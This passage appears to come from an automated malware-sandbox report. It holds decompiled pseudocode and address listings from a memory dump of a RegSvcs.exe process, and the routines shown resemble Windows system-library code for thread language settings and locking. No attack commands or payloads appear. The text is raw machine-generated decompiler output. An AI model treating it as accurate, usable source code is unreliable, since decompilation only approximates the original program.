												_t330 = E00FE2AE4( &_v36, _a8, _t281, _a16, _a20, _a24);
												_v32 = _t330;
												__eflags = _t330 - 0xc0000100;
												if(_t330 != 0xc0000100) {
													goto L69;
												} else {
													_t321 = 1;
													_t290 = _v36;
													goto L75;
												}
											} else {
												_t252 = E00FC6600( *(_t309 + 0x1c));
												__eflags = _t252;
												if(_t252 != 0) {
													goto L106;
												} else {
													_t290 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t330 = E00FE2C50(_t290, _a8, _t281, _a16, _a20, _a24, _t321);
											L76:
											_v32 = _t330;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00FCEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t330 = _a24;
									_t259 = E00FE2AE4( &_v36, _a8, _t281, _a16, _a20, _t330);
									_v32 = _t259;
									__eflags = _t259 - 0xc0000100;
									if(_t259 == 0xc0000100) {
										_v32 = E00FE2C50(_v36, _a8, _t281, _a16, _a20, _t330, 1);
									}
									_v8 = _t321;
									E00FE2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t245 = _t330;
					}
					L70:
					return E0100D0D1(_t245);
				}
				L108:
			}

0x00fe2584
0x00fe2586
0x00fe2590
0x00fe2596
0x00fe2597
0x00fe2598
0x00fe2599
0x00fe259e
0x00fe25a4
0x00fe25a9
0x00fe25ac
0x00fe25ae
0x00fe25b1
0x00fe25b2
0x00fe25b5
0x00fe25b8
0x00fe25bb
0x00fe25bc
0x00fe25bf
0x00fe25c2
0x00fe25c5
0x00fe25c6
0x00fe25cb
0x00fe25ce
0x00fe25d8
0x00fe25dd
0x00fe25de
0x00fe25e1
0x00fe25e3
0x00fe25e9
0x00fe26da
0x00fe26da
0x00fe26dd
0x00fe26e2
0x01025b56
0x00000000
0x00fe26e8
0x00fe26f9
0x00fe26fb
0x00fe26fe
0x00fe2700
0x01025b60
0x00000000
0x00fe2706
0x00fe2706
0x00fe270a
0x00fe270a
0x00fe270d
0x00fe2713
0x00fe2716
0x00fe2718
0x00fe271c
0x00fe271e
0x01025b6c
0x01025b6f
0x01025b7f
0x01025b89
0x01025b8e
0x01025b93
0x01025b96
0x01025b9c
0x01025ba0
0x01025ba3
0x01025bab
0x01025bb0
0x01025bb3
0x01025bb3
0x01025ba3
0x00fe2724
0x00fe2726
0x00fe2729
0x00fe272c
0x00fe279d
0x00fe279d
0x00fe27a0
0x00fe27a2
0x00000000
0x00fe272e
0x00fe272e
0x00fe2731
0x00fe2734
0x00fe2734
0x00fe2736
0x01025bc1
0x01025bc1
0x01025bc4
0x00000000
0x01025bca
0x01025bca
0x01025bcd
0x00000000
0x01025bd3
0x00000000
0x01025bd3
0x01025bcd
0x00fe273c
0x00fe273c
0x00fe2742
0x00fe2747
0x00fe274a
0x00fe274d
0x00fe2750
0x00000000
0x00fe2756
0x00fe2756
0x00000000
0x00fe2902
0x00fe2908
0x00fe290b
0x00000000
0x00fe2911
0x00fe291c
0x00fe2921
0x00000000
0x00fe2921
0x00000000
0x00000000
0x00fe2880
0x00fe2887
0x00fe288c
0x00000000
0x00000000
0x00fe2805
0x00fe280a
0x00fe2814
0x00fe2816
0x00000000
0x00000000
0x00fe281e
0x00fe2821
0x00fe2823
0x00000000
0x00fe2829
0x00fe2829
0x00fe2831
0x00fe283c
0x00fe283e
0x00000000
0x00fe283e
0x00000000
0x00000000
0x00fe284e
0x00fe2850
0x00fe2851
0x00fe2854
0x00fe2857
0x00fe285a
0x00fe285c
0x00fe285d
0x00000000
0x00000000
0x00fe275d
0x00fe2761
0x00000000
0x00fe2767
0x00fe276e
0x00fe2773
0x00fe2773
0x00fe2776
0x00fe2778
0x00fe277e
0x00fe277e
0x00fe2781
0x00fe2781
0x00fe2783
0x00fe2784
0x00000000
0x00000000
0x01025bd8
0x01025bde
0x01025be4
0x01025be6
0x01025be8
0x01025be9
0x01025bee
0x01025bf8
0x01025bff
0x01025c01
0x01025c04
0x01025c07
0x01025c0b
0x01025c0d
0x01025c0d
0x01025c15
0x01025c18
0x01025c1b
0x01025c1b
0x01025c1e
0x00000000
0x00000000
0x00fe28c3
0x00fe28c8
0x00fe28d2
0x00fe28d4
0x00fe28d8
0x00fe28db
0x01025c26
0x01025c28
0x01025c2d
0x01025c2d
0x00000000
0x00000000
0x01025c34
0x01025c36
0x01025c49
0x01025c4e
0x01025c54
0x01025c5b
0x01025c5d
0x01025c60
0x00fe2788
0x00fe2788
0x00fe278b
0x00fe278e
0x00fe278e
0x00fe278e
0x00fe2791
0x00000000
0x00000000
0x00fe2756
0x00fe2750
0x00000000
0x00fe2794
0x00fe2794
0x00fe2795
0x00fe2798
0x00fe2798
0x00000000
0x00fe2734
0x00fe272c
0x00fe2700
0x00fe25ef
0x00fe25ef
0x00fe25ef
0x00fe25f2
0x00fe25f8
0x00000000
0x00000000
0x00fe25fe
0x00000000
0x00fe28e6
0x00fe28ec
0x00fe28ef
0x00fe28f5
0x00fe28f8
0x00fe28f8
0x00000000
0x00fe28f8
0x00000000
0x00000000
0x00fe2866
0x00fe2866
0x00fe2876
0x00fe2879
0x00000000
0x00000000
0x00fe27e0
0x00fe27e7
0x00fe27e9
0x00fe27eb
0x01025afd
0x00000000
0x01025afd
0x00000000
0x00000000
0x00fe2633
0x00fe2638
0x00fe263b
0x00fe263c
0x00fe263e
0x00fe2640
0x00fe2642
0x00fe2647
0x00fe2649
0x00fe264e
0x00fe2650
0x00fe2653
0x00fe2659
0x00fe26a2
0x00fe26a7
0x00fe26ac
0x00fe26b2
0x01025b11
0x01025b15
0x01025b17
0x00000000
0x00fe26b8
0x00fe26b8
0x00fe26ba
0x00fe27a6
0x00fe27a6
0x00fe27a9
0x00fe27ab
0x00fe27b9
0x00fe27b9
0x00fe27be
0x00fe27c1
0x00fe27c3
0x00fe27c5
0x00fe27c7
0x01025c74
0x01025c79
0x01025c79
0x00fe27c7
0x00000000
0x00fe26c0
0x00fe26c0
0x00fe26c3
0x00fe26c6
0x00fe26c6
0x00fe26c9
0x00fe26c9
0x00000000
0x00fe26c9
0x00fe26ba
0x00fe265b
0x00fe265b
0x00fe265e
0x00fe2667
0x00fe266d
0x00fe2677
0x00fe267c
0x00fe267f
0x00fe2681
0x01025b49
0x01025b4e
0x00fe27cd
0x00fe27d0
0x00fe27d1
0x00fe27d2
0x00fe27d4
0x00fe27dd
0x00fe2687
0x00fe2687
0x00fe268a
0x00fe268b
0x00fe268e
0x00fe268f
0x00fe2691
0x00fe2696
0x00fe2698
0x00fe269d
0x00fe269f
0x00000000
0x00fe269f
0x00fe2681
0x00000000
0x00000000
0x00fe2846
0x00000000
0x00000000
0x00fe2605
0x00fe260a
0x00fe260c
0x00fe2611
0x00fe2616
0x00fe2619
0x00fe2619
0x00fe261e
0x00000000
0x00fe2624
0x00fe2627
0x00fe2627
0x00000000
0x00000000
0x01025b1f
0x00000000
0x00000000
0x00fe2894
0x00fe289b
0x00fe289d
0x00fe28a1
0x01025b2b
0x01025b2e
0x01025b2e
0x00fe28a7
0x00fe28a9
0x01025b04
0x01025b09
0x01025b09
0x01025b09
0x00000000
0x00000000
0x01025b35
0x01025b3c
0x00fe28fb
0x00fe28fb
0x00fe26cc
0x00fe26cc
0x00fe26d0
0x00000000
0x00fe26d2
0x00fe26d2
0x00000000
0x00fe26d2
0x00000000
0x00000000
0x00fe25fe
0x00fe292d
0x00fe292f
0x00fe2930
0x00fe2935
0x00fe2937
0x00fe2939
0x00fe293c
0x00fe293e
0x00fe293f
0x00fe2941
0x00fe2948
0x00fe294e
0x00fe2951
0x00fe2951
0x00fe2954
0x00fe295a
0x00fe295c
0x00fe2962
0x00fe2963
0x00fe2965
0x00fe2968
0x00fe296b
0x00fe296e
0x00fe296f
0x00fe2971
0x00fe2974
0x00fe297d
0x00fe297e
0x00fe297f
0x00fe2980
0x00fe2981
0x00fe2982
0x00fe2983
0x00fe2984
0x00fe2985
0x00fe2986
0x00fe2987
0x00fe2988
0x00fe2989
0x00fe298a
0x00fe298b
0x00fe298c
0x00fe298d
0x00fe298e
0x00fe298f
0x00fe2990
0x00fe2992
0x00fe2997
0x00fe29a3
0x00fe29a6
0x00fe29ab
0x00fe29ad
0x00fe29b0
0x00fe29b2
0x01025c80
0x00fe29b8
0x00fe29b8
0x00fe29bb
0x00fe29c0
0x00fe29c5
0x00fe29c6
0x00fe29c6
0x00fe29c9
0x00fe29cb
0x00000000
0x00000000
0x00fe29cd
0x00fe29d0
0x00fe29d9
0x00fe29db
0x00fe29dd
0x00fe2a7f
0x00fe2a84
0x00fe2a87
0x00fe2a89
0x01025ca1
0x01025ca3
0x00000000
0x00fe2a8f
0x00fe2a8f
0x00000000
0x00fe2a8f
0x00000000
0x00fe29e3
0x00fe29e3
0x00fe29e3
0x00000000
0x00fe29e3
0x00fe29dd
0x00000000
0x00fe29db
0x00fe29e6
0x00fe29e9
0x00fe29eb
0x00fe29ed
0x00fe29f3
0x00fe29f5
0x00fe29f8
0x00fe29fa
0x00fe2a97
0x00fe2a9a
0x00fe2a9d
0x00fe2add
0x00000000
0x00fe2a9f
0x00fe2aa2
0x00fe2aa5
0x00fe2aa8
0x00fe2aab
0x01025cab
0x01025caf
0x01025cc5
0x01025cda
0x01025cdc
0x01025cdf
0x01025ce5
0x00000000
0x01025ceb
0x01025ced
0x01025cee
0x00000000
0x01025cee
0x01025cb1
0x01025cb4
0x01025cb9
0x01025cbb
0x00000000
0x01025cbd
0x01025cbd
0x00000000
0x01025cbd
0x01025cbb
0x00fe2ab1
0x00fe2ab1
0x00fe2ac4
0x00fe2ac6
0x00fe2ac6
0x00000000
0x00fe2ac6
0x00fe2aab
0x00000000
0x00fe2a00
0x00fe2a09
0x00fe2a0e
0x00fe2a21
0x00fe2a24
0x00fe2a35
0x00fe2a3a
0x00fe2a3d
0x00fe2a42
0x00fe2a59
0x00fe2a59
0x00fe2a5c
0x00fe2a5f
0x00fe2a5f
0x00fe29fa
0x00fe29f3
0x00fe2a64
0x00fe2a64
0x00fe2a6b
0x00fe2a6b
0x00fe2a6d
0x00fe2a72
0x00fe2a72
0x00000000

Strings

PATH, xrefs: 00FE2642, 00FE2691

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: ae4b05bdfd254b5ed316b004d896b954b876039e60bcab64a4c4456bdd267508
Instruction ID: 17f19cf0b4636d75ce23a3a0972b7145a1f05a58824d282274db648162213666
Opcode Fuzzy Hash: ae4b05bdfd254b5ed316b004d896b954b876039e60bcab64a4c4456bdd267508
Instruction Fuzzy Hash: DDC1C2B2D00259DFCB65DF9ADC81BBEB7B9FF48710F584029E541AB250E734A841EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FBC962 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00FBC962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x10ad360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E00FCEEF0(0x10a70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0103F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E00FCEB70(_t29, 0x10a70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E00FFB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0103F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x10a70c0; // 0x0
					while(_t38 != 0x10a70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x10ab1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x00fbc96a
0x00fbc974
0x00fbc988
0x00fbc98a
0x01027c9d
0x01027c9f
0x01027ca4
0x01027cae
0x01027cf0
0x01027cf5
0x01027cfa
0x00fbc992
0x00fbc996
0x00fbc997
0x00fbc998
0x00fbc9a3
0x00fbc9a3
0x01027cb0
0x01027cb7
0x01027cbb
0x00000000
0x00000000
0x01027cbd
0x01027ce8
0x01027cc5
0x01027cc8
0x01027cca
0x01027cd0
0x01027cd6
0x01027cde
0x01027ce4
0x01027ce4
0x01027cd0
0x00000000
0x01027ce8
0x00fbc990
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e90ca742a9b13a92d13c8356e7276e99c1c587a3023c88422a2df13810bd38
Instruction ID: 41414cbcab8b013f4527ee0317dec3103501b4fede4319e593580b612f2bb7b7
Opcode Fuzzy Hash: 73e90ca742a9b13a92d13c8356e7276e99c1c587a3023c88422a2df13810bd38
Instruction Fuzzy Hash: E811213230071A9BC761AF7CCC82A6B7BE5BB94210F60062DF9C183651DB25EC10D7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00FEFAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00FEFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00FCEEF0(0x10a7b60);
					_t134 =  *0x10a7b84; // 0x77997b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x10a7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x10a7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00FC6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00FC76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01058938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00FBB150();
													}
													_t116 = E01056D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00FC75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x10a8638; // 0x0
																	_t122 = L00FC38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00FC76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00FC76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00FEFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00FC70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00FEFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00FEFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00FEFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00FEFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00FEFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x10a7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x10a7b84 = _t75;
						_t73 = E00FCEB70(_t134, 0x10a7b60);
						if( *0x10a7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00FCFF60( *0x10a7b20);
							}
						}
						goto L5;
					}
				}
			}

0x00fefab0
0x00fefab2
0x00fefab3
0x00fefab4
0x00fefabc
0x00fefac0
0x00fefb14
0x00fefb17
0x00fefac2
0x00fefac8
0x00fefacd
0x00fefad3
0x00fefad3
0x00fefadd
0x00fefb18
0x00fefb1b
0x00fefb1d
0x00fefb1e
0x00fefb1f
0x00fefb20
0x00fefb21
0x00fefb22
0x00fefb23
0x00fefb24
0x00fefb25
0x00fefb26
0x00fefb27
0x00fefb28
0x00fefb29
0x00fefb2a
0x00fefb2b
0x00fefb2c
0x00fefb2d
0x00fefb2e
0x00fefb2f
0x00fefb3a
0x00fefb3b
0x00fefb3e
0x00fefb41
0x00fefb44
0x00fefb47
0x00fefb4a
0x00fefb4d
0x00fefb53
0x0102bdcb
0x0102bdcb
0x00fefb59
0x00fefb5b
0x00fefb5b
0x00fefb5e
0x0102bdd5
0x0102bdd8
0x00000000
0x0102bdda
0x00000000
0x0102bdda
0x00fefb64
0x00fefb64
0x00fefb64
0x00fefb67
0x00fefb6e
0x00fefb70
0x00fefb72
0x00000000
0x00fefb78
0x00fefb7a
0x00fefb7a
0x00fefb7d
0x00fefb80
0x0102bddf
0x0102bde1
0x00000000
0x0102bde3
0x00000000
0x0102bde3
0x00fefb86
0x00fefb86
0x00fefb86
0x00fefb8b
0x00fefb90
0x00fefb92
0x00fefb94
0x00fefb9a
0x00fefb9b
0x00fefba1
0x0102bde8
0x0102bdeb
0x0102bded
0x0102beb5
0x0102beb5
0x0102bebb
0x0102bebd
0x0102bec3
0x0102bed2
0x0102bedd
0x0102bedd
0x0102beed
0x00000000
0x0102bdf3
0x0102bdfe
0x0102be06
0x0102be0b
0x0102be0d
0x0102be0f
0x0102be14
0x0102be19
0x0102be20
0x0102be25
0x0102be27
0x0102be35
0x0102be39
0x0102be46
0x0102be4f
0x0102be54
0x0102be56
0x0102bef8
0x0102bef8
0x00000000
0x0102be5c
0x0102be5c
0x0102be60
0x00000000
0x0102be66
0x0102be66
0x0102be7f
0x0102be84
0x0102be87
0x0102be89
0x0102be8b
0x0102be99
0x0102be9d
0x0102bea0
0x0102beac
0x0102beaf
0x0102beb1
0x0102beb3
0x0102beb3
0x00000000
0x0102bea2
0x0102bea2
0x00000000
0x0102bea2
0x0102be8d
0x0102be8d
0x0102be92
0x00000000
0x0102be92
0x0102be8b
0x0102be60
0x0102be3b
0x0102be3b
0x0102be3e
0x00000000
0x0102be40
0x0102be40
0x0102be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0102be44
0x0102be3e
0x0102be29
0x0102be29
0x00000000
0x0102be29
0x0102be27
0x00000000
0x00fefba7
0x00fefba7
0x00fefbab
0x0102bf02
0x00fefbb1
0x00fefbb1
0x00fefbb8
0x00fefbbd
0x00fefbbd
0x00fefbbf
0x00fefbbf
0x00fefbc5
0x00fefbcb
0x00fefbf8
0x00fefbf8
0x00fefbfa
0x00000000
0x00fefc00
0x00fefc00
0x00fefc03
0x00000000
0x00fefc09
0x00fefc09
0x00fefc0f
0x00fefc15
0x00fefc23
0x00fefc23
0x00fefc25
0x00fefc27
0x00fefc75
0x00fefc7c
0x00fefc84
0x00000000
0x00fefc29
0x00fefc29
0x00fefc2d
0x00fefc30
0x0102bf0f
0x00000000
0x00fefc36
0x00fefc38
0x00fefc3b
0x00fefc41
0x0102bf17
0x0102bf19
0x0102bf48
0x0102bf4b
0x00000000
0x0102bf1b
0x0102bf22
0x0102bf24
0x0102bf26
0x00000000
0x0102bf2c
0x0102bf37
0x0102bf39
0x0102bf3b
0x00000000
0x0102bf41
0x0102bf41
0x0102bf41
0x0102bf41
0x0102bf45
0x00000000
0x0102bf45
0x0102bf3b
0x0102bf26
0x00000000
0x00fefc47
0x00fefc47
0x00fefc49
0x00fefcb2
0x00fefcb4
0x00fefcb6
0x00fefcdc
0x00fefcdc
0x00000000
0x00fefcb8
0x00fefcc3
0x00fefcc5
0x00fefcc7
0x00000000
0x00fefcc9
0x00fefcc9
0x00fefccd
0x00000000
0x00fefccd
0x00fefcc7
0x00000000
0x00fefc4b
0x00fefc4b
0x00fefc4e
0x00fefc4e
0x00fefc51
0x00fefc51
0x00fefc54
0x00fefc5a
0x00fefc5c
0x00fefc5f
0x00fefc61
0x00fefc63
0x00fefc65
0x00fefc67
0x00fefc6e
0x00fefc72
0x00fefc72
0x00fefc72
0x00fefc72
0x00fefc67
0x00fefc61
0x00000000
0x00fefc5a
0x00fefc49
0x00fefc41
0x00fefc30
0x00fefc27
0x00fefc03
0x00fefbcd
0x00fefbd3
0x00fefbd9
0x00fefbdc
0x00fefbde
0x00fefc99
0x00fefc9b
0x00fefc9d
0x00fefcd5
0x00fefcd5
0x00fefc89
0x00fefc89
0x00000000
0x00fefc9f
0x00fefc9f
0x00fefca3
0x00000000
0x00fefca3
0x00000000
0x00fefbe4
0x00fefbe4
0x00fefbe4
0x00fefbe4
0x00fefbe9
0x00fefbf2
0x00000000
0x00fefbf2
0x00fefbde
0x00fefbcb
0x00fefbab
0x00fefc8b
0x00fefc8b
0x00fefc8c
0x00fefb80
0x00fefb72
0x00fefb5e
0x00fefc8d
0x00fefc91
0x00fefadf
0x00fefadf
0x00fefae1
0x00fefae4
0x00fefae7
0x00fefaec
0x00fefaf8
0x00fefb00
0x00fefb07
0x00fefb0f
0x00fefb0f
0x00fefb07
0x00000000
0x00fefaf8
0x00fefadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0102BE0F

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin
